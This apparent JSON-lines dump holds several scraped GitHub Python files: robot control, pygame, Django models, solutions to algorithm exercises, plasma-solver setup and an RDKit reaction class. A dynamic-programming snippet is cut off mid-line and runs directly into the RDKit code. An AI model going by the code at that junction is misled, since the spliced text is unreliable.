Calling move_direction(data)\n # Should be enough to move the omniwheeler\n rotation = direction_of_movement(data)\n # Move the wheels acw, cw, still to head in a specific direction NSEW\n #move_direction(rotation) \n rotation = str(direction_of_movement(data))\n print(\"\\ndata:\", data, '\\nWheel movement', rotation )\n move_direction(data) # This sends the signal to move the wheels\n await websocket.send_text(f\"The wheel Rotation is: {rotation}\")","repo_name":"tzunun/Omniwheeler","sub_path":"src/html.py","file_name":"html.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"19897831624","text":"import GlobalVariables as GetVar\r\nimport pygame\r\nimport GameDraw as Game\r\n\r\n\r\ndef PauseLoop():\r\n \r\n #game window\r\n window = pygame.display.set_mode((GetVar.win_x, GetVar.win_y))\r\n \r\n #intro loop\r\n while GetVar.PauseState:\r\n \r\n #define the refresh rate\r\n pygame.time.delay(GetVar.Refresh_Rate)\r\n \r\n #allow the user to close the window\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n GetVar.PauseState = False\r\n GetVar.GameState = False\r\n \r\n #set the background color\r\n Game.SolidBackgroundColor(window, \"pink\")\r\n \r\n #some other stuff here\r\n Game.Rect_Button(window, \"\", \"limegreen\", \"\", \"\", 0, GetVar.win_x*0.25, GetVar.win_y*0.75, 50, 25)\r\n Game.Rect_Button(window, \"\", \"red\", \"\", \"\", 0, GetVar.win_x*0.65, GetVar.win_y*0.75, 50, 25)\r\n \r\n #see if the mouse is hovering over the button \r\n MousePos = pygame.mouse.get_pos()\r\n if MousePos[0] > GetVar.win_x*0.25 and MousePos[0] < GetVar.win_x*0.25 + 50:\r\n if MousePos[1] > GetVar.win_y*0.75 and MousePos[1] < GetVar.win_y*0.75 + 25:\r\n Game.Rect_Button(window, \"\", \"lime\", \"\", \"\", 0, GetVar.win_x*0.25, GetVar.win_y*0.75, 50, 25)\r\n LeftClick = pygame.mouse.get_pressed()[0]\r\n if LeftClick == True:\r\n GetVar.PauseState = False\r\n \r\n if MousePos[0] > GetVar.win_x*0.65 and MousePos[0] < GetVar.win_x*0.65 + 50:\r\n if MousePos[1] > GetVar.win_y*0.75 and MousePos[1] < GetVar.win_y*0.75 + 25:\r\n Game.Rect_Button(window, \"\", \"lightcoral\", \"\", \"\", 0, GetVar.win_x*0.65, GetVar.win_y*0.75, 50, 25)\r\n \r\n \r\n \r\n #update the display\r\n pygame.display.update()","repo_name":"ErickAiken/Python","sub_path":"PyGame/PauseLoop.py","file_name":"PauseLoop.py","file_ext":"py","file_size_in_byte":1880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"679643185","text":"from django.core.exceptions import ObjectDoesNotExist\nfrom django.db import models\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\n\nfrom thoughts.hashtags import unique_hashtags\n\n\nclass Thought(models.Model):\n owner = models.ForeignKey(\n 'auth.User',\n editable=False,\n on_delete=models.CASCADE\n )\n thought = models.TextField(max_length=800, editable=False)\n created_at = models.DateTimeField(auto_now_add=True, editable=False)\n\n def __str__(self):\n return self.thought\n\n\nclass Hashtag(models.Model):\n creator = models.ForeignKey(\n 'auth.User',\n editable=False,\n on_delete=models.SET_NULL,\n null=True\n )\n hashtag = models.TextField(max_length=100, editable=False, unique=True)\n created_at = models.DateTimeField(auto_now_add=True, editable=False)\n thoughts = models.ManyToManyField(Thought)\n\n\n@receiver(post_save, sender=Thought)\ndef register_thought_hashtags(sender, 
created, instance, **kwargs):\n if created:\n hashtags = unique_hashtags(instance.thought)\n for hashtag in hashtags:\n try:\n hashtag_model = Hashtag.objects.get(hashtag=hashtag)\n except ObjectDoesNotExist:\n hashtag_model = Hashtag(hashtag=hashtag, creator=instance.owner)\n hashtag_model.save()\n\n hashtag_model.thoughts.add(instance)\n hashtag_model.save()\n print('Houston, we have a problem')\n","repo_name":"antunesleo/thoughts-api","sub_path":"thoughts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"25888935061","text":"import cv2\n\n# Detection History\nHISTORY_WINDOW = 60 # in seconds\nHISTORY_FREQUENCY = 0.5 # in seconds, the frequency the history is updated + image is changed\n\n# Stable Detections\nAVERAGE_WINDOW = 5 # in seconds\n\n# Display\nBBOX_COLOR = (255,0,0) # B, G, R\nCOUNT_COLOR = (0,0, 255) # B, G, R\nCONFIDENCE_COLOR = (255,255,255) # B, G, R\n\nFONT = cv2.FONT_HERSHEY_SIMPLEX\nFONT_SIZE = 0.5\nTEXT_THICKNESS = 1\n","repo_name":"OSU-AIClub/Object-Detection-Project","sub_path":"opencv_deployment/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"21142109890","text":"import sys\ninput = lambda: sys.stdin.readline().rstrip()\n\nsys.setrecursionlimit(10**9)\n\ndx, dy = [-1, 1, 0, 0], [0, 0, -1, 1]\n\ndef dfs(x, y):\n if visited[x][y]: return visited[x][y]\n visited[x][y] = 1\n for i in range(4):\n nx, ny = x+dx[i], y+dy[i]\n if (0 <= nx < n) and (0 <= ny < n) and board[x][y] < board[nx][ny]:\n visited[x][y] = max(visited[x][y], dfs(nx, ny)+1)\n return visited[x][y]\n\n\nn = int(input())\nboard = [list(map(int, input().split())) for _ in range(n)]\nvisited = [[0]*n for _ in range(n)]\n\nans = 0\nfor i in range(n):\n for j in range(n):\n ans = max(ans, dfs(i, j))\n\nprint(ans)\n","repo_name":"cpwoo/CodeTest","sub_path":"Python/boj/graph/1937.py","file_name":"1937.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"2612069098","text":"import numpy as np\nimport arrayfire as af \n\nclass config:\n pass\n\ndef set(params):\n \"\"\"\n Used to set the parameters that are used in the simulation\n\n Parameters:\n -----------\n params : Name of the file that contains the parameters for the simulation run\n is passed to this function. \n\n Output:\n -------\n config : Object whose attributes contain all the simulation parameters. 
This is\n passed to the remaining solver functions.\n \"\"\"\n \n config.mass_particle = params.constants['mass_particle']\n config.boltzmann_constant = params.constants['boltzmann_constant']\n\n config.rho_background = params.background_electrons['rho']\n config.temperature_background = params.background_electrons['temperature']\n config.vel_bulk_background = params.background_electrons['vel_bulk']\n\n config.pert_x_real = params.perturbation['pert_x_real']\n config.pert_x_imag = params.perturbation['pert_x_imag']\n config.k_x = params.perturbation['k_x']\n\n config.N_vel_x = params.size['N_vel_x']\n config.N_x = params.size['N_x']\n config.vel_x_max = params.size['vel_x_max']\n config.N_ghost_x = params.size['N_ghost_x']\n config.left_boundary = params.size['left_boundary']\n config.right_boundary = params.size['right_boundary']\n\n config.final_time = params.time['final_time']\n config.dt = params.time['dt']\n \n config.fields_enabled = params.EM_fields['enabled']\n config.charge_particle = params.EM_fields['charge_particle']\n\n config.collisions_enabled = params.collisions['enabled']\n config.collision_operator = params.collisions['collision_operator']\n config.tau = params.collisions['tau']\n\n return config\n\ndef calculate_x(config):\n \"\"\"\n Returns the 2D array of x which is used in the computations of the Cheng-Knorr code.\n\n Parameters:\n -----------\n config : Object config which is obtained by set() is passed to this file\n\n Output:\n -------\n x : Array holding the values of x tiled along axis 1\n \"\"\"\n N_x = config.N_x\n N_vel_x = config.N_vel_x\n N_ghost_x = config.N_ghost_x\n\n left_boundary = config.left_boundary\n right_boundary = config.right_boundary\n\n x = np.linspace(left_boundary, right_boundary, N_x)\n dx = x[1] - x[0]\n\n x_ghost_left = np.linspace(-(N_ghost_x)*dx + left_boundary, left_boundary - dx, N_ghost_x)\n x_ghost_right = np.linspace(right_boundary + dx, right_boundary + N_ghost_x*dx , N_ghost_x)\n\n x = np.concatenate([x_ghost_left, x, x_ghost_right])\n x = af.Array.as_type(af.to_array(x), af.Dtype.f64)\n x = af.tile(x, 1, N_vel_x)\n\n af.eval(x)\n return x\n\ndef calculate_vel_x(config):\n \"\"\"\n Returns the 2D array of vel_x which is used in the computations of the Cheng-Knorr code.\n\n Parameters:\n -----------\n config : Object config which is obtained by set() is passed to this file\n\n Output:\n -------\n x : Array holding the values of vel_x tiled along axis 0\n \"\"\"\n N_x = config.N_x\n N_vel_x = config.N_vel_x\n N_ghost_x = config.N_ghost_x\n vel_x_max = config.vel_x_max\n\n vel_x = np.linspace(-vel_x_max, vel_x_max, N_vel_x)\n vel_x = af.Array.as_type(af.to_array(vel_x), af.Dtype.f64)\n vel_x = af.tile(af.reorder(vel_x), N_x + 2*N_ghost_x, 1)\n\n af.eval(vel_x)\n return vel_x\n\n\ndef f_background(config):\n \"\"\"\n Returns the value of f_background, depending on the parameters set in \n the config class\n\n Parameters:\n -----------\n config : Class config which is obtained by set() is passed to this file\n\n Output:\n -------\n f_background : Array which contains the values of f_background at different values\n of vel_x and x\n \"\"\"\n \n mass_particle = config.mass_particle\n boltzmann_constant = config.boltzmann_constant\n\n rho_background = config.rho_background\n temperature_background = config.temperature_background\n vel_x = calculate_vel_x(config)\n\n f_background = rho_background * np.sqrt(mass_particle/(2*np.pi*boltzmann_constant*temperature_background)) * \\\n 
af.exp(-mass_particle*vel_x**2/(2*boltzmann_constant*temperature_background))\n\n    af.eval(f_background)\n    return f_background\n\ndef f_initial(config):\n    \"\"\"\n    Returns the value of f_initial, depending on the parameters set in \n    the config object\n\n    Parameters:\n    -----------\n    config : Object config which is obtained by set() is passed to this file\n\n    Output:\n    -------\n    f_initial : Array which contains the values of f_initial at different values\n                of vel_x and x\n    \"\"\"\n    \n    mass_particle = config.mass_particle\n    boltzmann_constant = config.boltzmann_constant\n\n    rho_background = config.rho_background\n    temperature_background = config.temperature_background\n    vel_x = calculate_vel_x(config)\n\n    pert_x_real = config.pert_x_real\n    pert_x_imag = config.pert_x_imag\n    k_x = config.k_x\n\n    x = calculate_x(config)\n    rho = rho_background + (pert_x_real * af.cos(2*np.pi*x) - pert_x_imag * af.sin(2*np.pi*x))\n\n    f_initial = rho * np.sqrt(mass_particle/(2*np.pi*boltzmann_constant*temperature_background)) * \\\n                af.exp(-mass_particle*vel_x**2/(2*boltzmann_constant*temperature_background))\n\n    af.eval(f_initial)\n    return f_initial\n\ndef time_array(config):\n    \"\"\"\n    Returns the value of the time_array at which we solve for in the simulation. \n    The time_array is set depending on the options which have been mentioned in config.\n\n    Parameters:\n    -----------\n    config : Class config which is obtained by set() is passed to this file\n\n    Output:\n    -------\n    time_array : Array that contains the values of time at which the \n                 simulation evaluates the physical quantities. \n\n    \"\"\"\n    final_time = config.final_time\n    dt = config.dt\n\n    time_array = np.arange(0, final_time + dt, dt)\n\n    return time_array","repo_name":"mchandra/Boltzmann-Solver","sub_path":"cks/initialize.py","file_name":"initialize.py","file_ext":"py","file_size_in_byte":5817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"19828349003","text":"#-*-coding:utf8;-*-\n#qpy:3\n#qpy:console\n\n#data = {'A':[[],[]], 'B':[[],[]], 'C':[['A', 'B'],[]], 'D':[['C'],[]]}\n\n# error: Failed test 2: wrong answer\n# need to add insertion of an undeclared parent into the data dictionary\n# still Failed test 2: wrong answer\n# beautified the list\n# still Failed test 2: wrong answer\n# tried printing \"Yes\" when checking equality of ancestor and descendant, even if they are not in the list\n# still Failed test 2: wrong answer \n\ndata = {}\nlost = []\n\ndef getanc(k):\n    if data[k][0] != []:\n        # if the list of parents is not empty\n        for p in data[k][0]:\n            # iterate over the parents\n            if p in data.keys():\n                # if the parent was declared earlier\n                if data[p][1] == []:\n                    # and if the parent's ancestor list is empty\n                    getanc(p)\n                    # run this function for the parent\n                data[k][1].extend(data[p][1])\n                # add the parent's ancestors to our own ancestor list\n                \n            else:\n                # otherwise, i.e. when the parent was not declared earlier\n                if p not in lost:\n                    # if the parent is not yet among the orphans\n                    lost.append(p)\n                    # add it to the orphans\n                \n                data[k][1].append(p)\n                # add such a parent to the ancestors\n                \n        if k not in data[k][1]:\n            data[k][1].append(k)\n            # and add ourselves to our own ancestor list\n    else:\n        # otherwise, i.e. if the list of parents is empty\n        data[k][1].append(k)\n        # add ourselves to our own ancestor list\n\n\nn = int(input())\n\nfor i in range(n):\n    line = input().strip()\n    if \":\" not in line:\n        data[line] = [[],[]]\n    else: # need to append to the parent list under a known key\n        line = [j for j in line.split(\" : \")]\n        line[0] = line[0].strip()\n        if \" \" in line[1]:\n            line[1] = [j for j in line[1].split()]\n            line[1] = list(map(lambda silly: silly.strip(), line[1]))\n        else:\n            line[1] = line[1].strip()\n        \n        if line[0] in data.keys():\n            data[line[0]][0].extend(line[1])\n        else:\n            data[line[0]] = [[],[]]\n            data[line[0]][0].extend(line[1])\n    #print(data)\n\nfor i in data.keys():\n    getanc(i)\n\nfor i in lost:\n    data[i] = [[],[i]]\n\n#print(data)\n\nq = int(input())\n\nfor i in range(q):\n    line = [j for j in input().strip().split()]\n    line = list(map(lambda sin: sin.strip(), line))\n    if line[0] in data.keys() and line[1] in data.keys():\n        if line[0] in data[line[1]][1]:\n            print('Yes')\n        else:\n            print('No')\n    else:\n        #if line[0] == line[1]:\n        # experiment - if the keys are not in the dictionary but they are equal\n        #print('Yes')\n        print('No')\n\n\n\n'''\nlst_mro = ['G : F','A','B : A','C : A','D : B C','E : D','F : D','X','Y : X A','Z : X','V : Z Y','W : V']\nlst_q = ['A G','A Z','A W','X W','X QWE','A X','X X','1 1']\n\n'''\n'''\nlst_mro = ['A : B C D G H','B : C E G H K L','C : E D H K L','E : D F K L','D : G H','F : K','G : F','H : L','K : H L','L']\nlst_q = ['K D','D A','G D','H A','E E','H G','E L','B D','D L','D G','D E','A F','A C','K A','A H','K D','H B','K B','D L','G G','A H','K L','G E','B A','C K','K L','C L','H L','G C','D D','C G','E A','F K','B G','H L','L F','H G','D A']\nlst_res = ['Yes','Yes','Yes','Yes','Yes','Yes','No','No','No','No','Yes','No','No','Yes','No','Yes','Yes','Yes','No','Yes','No','No','Yes','Yes','No','No','No','Yes','Yes','No','Yes','No','No','No','Yes','Yes','Yes','No']\n\nfor i in lst_mro:\n    if \":\" not in i:\n        data[i] = [[],[]]\n    else:\n        i = [j for j in i.split(\" : \")]\n        if \" \" in i[1]:\n            i[1] = [j for j in i[1].split()]\n        data[i[0]] = [[],[]]\n        data[i[0]][0].extend(i[1])\n    print(data)\n\n\nfor i in data.keys():\n    getanc(i)\n\nfor i in lost:\n    data[i] = [[],[i]]\n\nprint(data)\n\nresults = []\n\nfor i in lst_q:\n    i = i.split()\n    if i[0] in data.keys() and i[1] in data.keys():\n        if i[0] in data[i[1]][1]:\n            print('Yes')\n            results.append('Yes')\n        else:\n            print('No')\n            results.append('No')\n    else:\n        print(\"No\")\n        results.append('No')\n\nfrom itertools import compress\n\nif results == lst_res:\n    print(\"Test correct\")\nelse:\n    print(\"Test incorrect\")\n    print(list(map(lambda i: print(results[i], lst_res[i], lst_q[i], sep = \" \"), range(len(results)))))\n'''","repo_name":"Miffka/Python2","sub_path":"Python2_14_task4_try2.py","file_name":"Python2_14_task4_try2.py","file_ext":"py","file_size_in_byte":5263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"31759238669","text":"import sys\n\n\nclass stack():\n    def __init__(self):\n        self.stacklist = []\n\n    def pushX(self, x):\n        self.stacklist.append(x)\n\n    def size(self):\n        return len(self.stacklist)\n\n    def empty(self):\n        if self.size() == 0:\n            return 1\n        else:\n            return 0\n\n    def pop(self):\n        if self.empty():\n            print(-1)\n        else:\n            print(self.stacklist.pop())\n\n    def top(self):\n        if self.empty():\n            print(-1)\n        else:\n            print(self.stacklist[-1])\n\n\ns = stack()\n\nfor _ in range(int(sys.stdin.readline())):\n    r = sys.stdin.readline().split()\n\n    if r[0] == 'push':\n        s.pushX(r[1])\n    elif r[0] == 'top':\n        s.top()\n    elif r[0] == 'size':\n        print(s.size())\n    elif r[0] == 'empty':\n        print(s.empty())\n    elif r[0] == 'pop':\n
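        # pop() both prints the top element (or -1 on an empty stack) and removes it.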
s.pop()\n","repo_name":"goodhonestgood/improve","sub_path":"파이썬/10828.py","file_name":"10828.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"8765002936","text":"\"\"\"\nThe set [1,2,3,...,n] contains a total of n! unique permutations.\n\nBy listing and labeling all of the permutations in order, we get the following sequence for n = 3:\n\n    \"123\"\n    \"132\"\n    \"213\"\n    \"231\"\n    \"312\"\n    \"321\"\n\nGiven n and k, return the kth permutation sequence.\n\nNote:\n\n    Given n will be between 1 and 9 inclusive.\n    Given k will be between 1 and n! inclusive.\n\"\"\"\nfrom math import factorial\n\n\nclass Solution:\n    def getPermutation(self, n: int, k: int) -> str:\n        nums = list(range(1,n+1))\n        res = \"\"\n        \n        for i in range(n, 0, -1):\n            digits = (k-1)//factorial(i-1)\n            k -= digits*factorial(i-1)\n            res = res + str(nums[digits])\n            nums.remove(nums[digits])\n        \n        return res ","repo_name":"pkdism/leetcode","sub_path":"june-leetcoding-challenge/d20-permutation-sequence.py","file_name":"d20-permutation-sequence.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"28310545624","text":"def unique_array(lst):\n    ans = []\n    for i in range(len(lst)):\n        check = False\n        for j in range(len(lst)):\n            if lst[i] == lst[j]:\n                if i != j:\n                    check = True\n        if check != 1:\n            ans.append(lst[i])\n    return ans\n\nn = int(input())\nl = list()\nfor i in range(n):\n    x = int(input())\n    l.append(x)\nprint(unique_array(l))","repo_name":"idonaiky/pp2","sub_path":"week 3/functions1.md/10.py","file_name":"10.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"13838700708","text":"import sys\r\ninput=sys.stdin.readline\r\n\r\nn=int(input())\r\nINF=int(1e9)\r\nside=[]\r\narr=[0]\r\ndp=[INF]*300001\r\ndp[0]=0\r\nfor i in range(1, 122):\r\n    side.append(i*(i+1)//2)\r\nfor i in range(len(side)):\r\n    arr.append(arr[i]+side[i])\r\nfor i in range(1, 300001):\r\n    for j in range(1, len(arr)):\r\n        t=arr[j]\r\n        if i>\")\n        except ValueError as exc:\n            raise ValueError('Not a valid reaction smiles, missing \">>\".') from exc\n        return cls.from_reactant_and_product_smiles(rsmi=rsmi, psmi=psmi)\n\n    def init_reactant_product(\n        self,\n        reactant: Union[List[RDKitMol], RDKitMol],\n        product: Union[List[RDKitMol], RDKitMol],\n    ):\n        \"\"\" \"\"\"\n        if isinstance(reactant, list):\n            self.reactant = reactant\n            self.reactant_complex = self._combine_multiple_mols(reactant)\n        else:\n            self.reactant = list(reactant.GetMolFrags(asMols=True))\n            self.reactant_complex = reactant\n        if isinstance(product, list):\n            self.product = product\n            self.product_complex = self._combine_multiple_mols(product)\n        else:\n            self.product = list(product.GetMolFrags(asMols=True))\n            self.product_complex = product\n\n    @staticmethod\n    def _combine_multiple_mols(mols: List[RDKitMol]) -> RDKitMol:\n        \"\"\"\n        Combine multiple molecules into a complex.\n\n        Args:\n            mols (List[RDKitMol]): The list of molecules to combine.\n        \"\"\"\n        return reduce(lambda x, y: x.CombineMol(y), mols)\n\n    @property\n    def is_num_atoms_balanced(self) -> bool:\n        \"\"\"\n        Whether the number of atoms in the reactant(s) and product(s) are balanced.\n        \"\"\"\n        return self.reactant_complex.GetNumAtoms() == self.product_complex.GetNumAtoms()\n\n    @property\n    def reactant_element_count(self) -> dict:\n        \"\"\"\n        The element count in the reactant(s) and
product(s).\n \"\"\"\n return dict(Counter(self.reactant_complex.GetElementSymbols()))\n\n @property\n def product_element_count(self) -> dict:\n \"\"\"\n The element count in the reactant(s) and product(s).\n \"\"\"\n return dict(Counter(self.product_complex.GetElementSymbols()))\n\n @property\n def is_element_balanced(self) -> bool:\n \"\"\"\n Whether the elements in the reactant(s) and product(s) are balanced.\n \"\"\"\n if self.is_num_atoms_balanced:\n return Counter(self.reactant_complex.GetElementSymbols()) == Counter(\n self.product_complex.GetElementSymbols()\n )\n return False\n\n @property\n def is_charge_balanced(self) -> bool:\n \"\"\"\n Whether the charge in the reactant(s) and product(s) are balanced.\n \"\"\"\n return (\n self.reactant_complex.GetFormalCharge()\n == self.product_complex.GetFormalCharge()\n )\n\n @property\n def is_mult_equal(self) -> bool:\n \"\"\"\n Whether the spin multiplicity in the reactant(s) and product(s) are equal.\n \"\"\"\n return (\n self.reactant_complex.GetSpinMultiplicity()\n == self.product_complex.GetSpinMultiplicity()\n )\n\n @property\n def num_atoms(self) -> bool:\n \"\"\"\n The number of atoms involved in the reactant(s) and product(s).\n \"\"\"\n assert (\n self.is_num_atoms_balanced\n ), \"The number of atoms in the reactant(s) and product(s) are not balanced.\"\n return self.reactant_complex.GetNumAtoms()\n\n @property\n def num_reactants(self) -> int:\n \"\"\"\n The number of reactants.\n \"\"\"\n return len(self.reactant)\n\n @property\n def num_products(self) -> int:\n \"\"\"\n The number of products.\n \"\"\"\n return len(self.product)\n\n def require_bond_analysis(func):\n \"\"\"\n Timer decorator for recording the time of a function.\n\n Args:\n func (function): The function to be decorated.\n\n Returns:\n function: The decorated function.\n \"\"\"\n wraps(func)\n\n def wrapper(self, *args, **kwargs):\n try:\n return func(self, *args, **kwargs)\n except AttributeError:\n (\n self._formed_bonds,\n self._broken_bonds,\n self._changed_bonds,\n ) = get_all_changing_bonds(\n r_mol=self.reactant_complex,\n p_mol=self.product_complex,\n )\n return func(self, *args, **kwargs)\n\n return wrapper\n\n def bond_analysis(self):\n \"\"\"\n Perform bond analysis on the reaction.\n \"\"\"\n (\n self._formed_bonds,\n self._broken_bonds,\n self._changed_bonds,\n ) = get_all_changing_bonds(\n r_mol=self.reactant_complex,\n p_mol=self.product_complex,\n )\n\n @property\n @require_bond_analysis\n def num_broken_bonds(self) -> int:\n \"\"\"\n The number of bonds broken in the reaction.\n \"\"\"\n return len(self._broken_bonds)\n\n @property\n @require_bond_analysis\n def num_formed_bonds(self) -> int:\n \"\"\"\n The number of bonds broken in the reaction.\n \"\"\"\n return len(self._formed_bonds)\n\n @property\n @require_bond_analysis\n def num_changed_bonds(self) -> int:\n \"\"\"\n The number of bonds with bond order changed in the reaction.\n \"\"\"\n return len(self._changed_bonds)\n\n @property\n @require_bond_analysis\n def broken_bonds(self) -> List[Tuple[int]]:\n \"\"\"\n The bonds broken in the reaction.\n \"\"\"\n return self._broken_bonds\n\n @property\n @require_bond_analysis\n def formed_bonds(self) -> List[Tuple[int]]:\n \"\"\"\n The bonds formed in the reaction.\n \"\"\"\n return self._formed_bonds\n\n @property\n @require_bond_analysis\n def changed_bonds(self) -> List[Tuple[int]]:\n \"\"\"\n The bonds with bond order changed in the reaction.\n \"\"\"\n return self._changed_bonds\n\n @property\n @require_bond_analysis\n def 
active_bonds(self) -> List[Tuple[int]]:\n \"\"\"\n The bonds broken and formed in the reaction.\n \"\"\"\n return self._broken_bonds + self._formed_bonds\n\n @property\n @require_bond_analysis\n def involved_bonds(self) -> List[Tuple[int]]:\n \"\"\"\n The bonds broken and formed in the reaction.\n \"\"\"\n return self._broken_bonds + self._formed_bonds + self._changed_bonds\n\n @property\n @require_bond_analysis\n def active_atoms(self) -> List[int]:\n \"\"\"\n The atoms involved in the bonds broken and formed in the reaction.\n \"\"\"\n return list(set(chain(*self.active_bonds)))\n\n @property\n @require_bond_analysis\n def involved_atoms(self) -> List[int]:\n \"\"\"\n The atoms involved in the bonds broken and formed in the reaction.\n \"\"\"\n return list(set(chain(*self.involved_bonds)))\n\n @property\n def is_resonance_corrected(self) -> bool:\n \"\"\"\n Whether the reaction is resonance corrected.\n \"\"\"\n return getattr(self, '_is_resonance_corrected', False)\n\n def apply_resonance_correction(\n self,\n inplace: bool = True,\n ) -> \"Reaction\":\n \"\"\"\n Apply resonance correction to the reactant and product complexes.\n \"\"\"\n if self.is_resonance_corrected:\n # Avoid applying resonance correction multiple times\n # TODO: add a auto-clean somewhere to update this flag\n # TODO: when the reactant and product are changed\n return self\n try:\n rcps = generate_resonance_structures(\n self.reactant_complex,\n )\n except BaseException:\n rcps = [self.reactant_complex]\n try:\n pcps = generate_resonance_structures(\n self.product_complex,\n )\n except BaseException:\n pcps = [self.product_complex]\n\n n_changed_bonds = self.num_changed_bonds\n rmol = self.reactant_complex\n pmol = self.product_complex\n\n modify_flag = False\n for rcp, pcp in product(rcps, pcps):\n _, _, new_changed_bonds = get_all_changing_bonds(rcp, pcp)\n if len(new_changed_bonds) < n_changed_bonds:\n modify_flag = True\n n_changed_bonds = len(new_changed_bonds)\n rmol, pmol = rcp, pcp\n\n if modify_flag:\n if inplace:\n self.init_reactant_product(rmol, pmol)\n self.bond_analysis()\n self._is_resonance_corrected = True\n return self\n else:\n # todo: check if ts has 3d coordinates\n new_rxn = Reaction(rmol, pmol, ts=self.ts)\n new_rxn._is_resonance_corrected = True\n return new_rxn\n\n self._is_resonance_corrected = True\n return self\n\n def get_reverse_reaction(self):\n \"\"\"\n Get the reverse reaction.\n \"\"\"\n return Reaction(self.product_complex, self.reactant_complex, ts=self.ts)\n\n def to_smiles(\n self,\n remove_hs: bool = False,\n remove_atom_map: bool = False,\n **kwargs,\n ) -> str:\n \"\"\"\n Convert the reaction to reaction SMILES.\n \"\"\"\n rsmi = self.reactant_complex.ToSmiles(\n removeAtomMap=remove_atom_map, removeHs=remove_hs, **kwargs\n )\n psmi = self.product_complex.ToSmiles(\n removeAtomMap=remove_atom_map, removeHs=remove_hs, **kwargs\n )\n return f\"{rsmi}>>{psmi}\"\n\n def make_ts(self):\n \"\"\"\n Make the transition state of the reaction based on the reactant and product.\n This method assumes that the reactant complex and product complex are atom-mapped\n already.\n \"\"\"\n self.ts = self.reactant_complex.AddRedundantBonds(self.formed_bonds)\n return self.ts\n\n def _update_ts(self):\n \"\"\"\n Update the transition state of the reaction. 
Assign reaction, reactant,\n and product attributes to the transition state based on the reaction.\n \"\"\"\n if not hasattr(self._ts, \"reaction\"):\n self._ts.reaction = self\n if not hasattr(self._ts, \"reactant\"):\n self._ts.reactant = self.reactant_complex\n if not hasattr(self._ts, \"product\"):\n self._ts.product = self.product_complex\n\n @property\n def ts(self):\n \"\"\"\n The transition state of the reaction.\n \"\"\"\n if not hasattr(self, \"_ts\"):\n self.make_ts()\n self._update_ts()\n return self._ts\n\n @ts.setter\n def ts(self, mol: \"RDKitMol\"):\n \"\"\"\n Set the transition state of the reaction.\n \"\"\"\n self._ts = mol\n self._update_ts()\n\n def to_rdkit_reaction(self) -> rdChemReactions.ChemicalReaction:\n \"\"\"\n Convert the reaction to RDKit ChemicalReaction.\n \"\"\"\n return rdChemReactions.ReactionFromSmarts(self.to_smiles(), useSmiles=True)\n\n def draw_2d(\n self,\n font_scale: float = 1.0,\n highlight_by_reactant: bool = True,\n ) -> str:\n \"\"\"\n This is a modified version of the drawReaction2D function in RDKit.\n\n Args:\n font_scale (float, optional): The font scale for the atom map number. Defaults to 1.0.\n highlightByReactant (bool, optional): Whether to highlight the reactant(s) or product(s). Defaults to True.\n\n Returns:\n str: The SVG string. To display the SVG, use IPython.display.SVG(svg_string).\n \"\"\"\n\n def move_atommaps_to_notes(mol):\n for atom in mol.GetAtoms():\n if atom.GetAtomMapNum():\n atom.SetProp(\"atomNote\", str(atom.GetAtomMapNum()))\n\n rxn = self.to_rdkit_reaction()\n\n # move atom maps to be annotations:\n for mol in rxn.GetReactants():\n move_atommaps_to_notes(mol)\n for mol in rxn.GetProducts():\n move_atommaps_to_notes(mol)\n\n d2d = rdMolDraw2D.MolDraw2DSVG(800, 300)\n d2d.drawOptions().annotationFontScale = font_scale\n d2d.DrawReaction(rxn, highlightByReactant=highlight_by_reactant)\n\n d2d.FinishDrawing()\n\n return d2d.GetDrawingText()\n\n def has_same_reactants(\n self,\n other: \"Reaction\",\n resonance: bool = False,\n ) -> bool:\n \"\"\"\n Check if the reaction has the same reactants as the other reaction.\n\n Args:\n other (Reaction): The other reaction to compare.\n\n Returns:\n bool: Whether the reaction has the same reactants as the other reaction.\n \"\"\"\n return self.is_same_reactants(other.reactant_complex, resonance=resonance)\n\n def is_same_reactants(\n self,\n reactants: Union[List[RDKitMol], RDKitMol],\n resonance: bool = False,\n ) -> bool:\n \"\"\"\n Check if the reaction has the same reactants as the given reactants or reactant complex.\n\n Args:\n reactant (Union[List[RDKitMol], RDKitMol]): The reactants or reactant complex to compare.\n resonance (bool, optional): Whether to consider resonance structures. 
Defaults to ``False``.\n\n Returns:\n bool: Whether the reaction has the same reactants as the given reactants or reactant complex.\n \"\"\"\n return is_same_complex(self.reactant_complex, reactants, resonance=resonance)\n\n def has_same_products(\n self,\n other: \"Reaction\",\n resonance: bool = False,\n ) -> bool:\n \"\"\"\n Check if the reaction has the same products as the other reaction.\n\n Args:\n other (Reaction): The other reaction to compare.\n\n Returns:\n bool: Whether the reaction has the same products as the other reaction.\n \"\"\"\n return self.is_same_products(other.product_complex, resonance=resonance)\n\n def is_same_products(\n self,\n products: Union[List[RDKitMol], RDKitMol],\n resonance: bool = False,\n ):\n \"\"\"\n Check if the reaction has the same products as the given products or product complex.\n\n Args:\n product (Union[List[RDKitMol], RDKitMol]): The products or product complex to compare.\n resonance (bool, optional): Whether to consider resonance structures. Defaults to ``False``.\n\n Returns:\n bool: Whether the reaction has the same products as the given products or product complex.\n \"\"\"\n return is_same_complex(self.product_complex, products, resonance=resonance)\n\n def 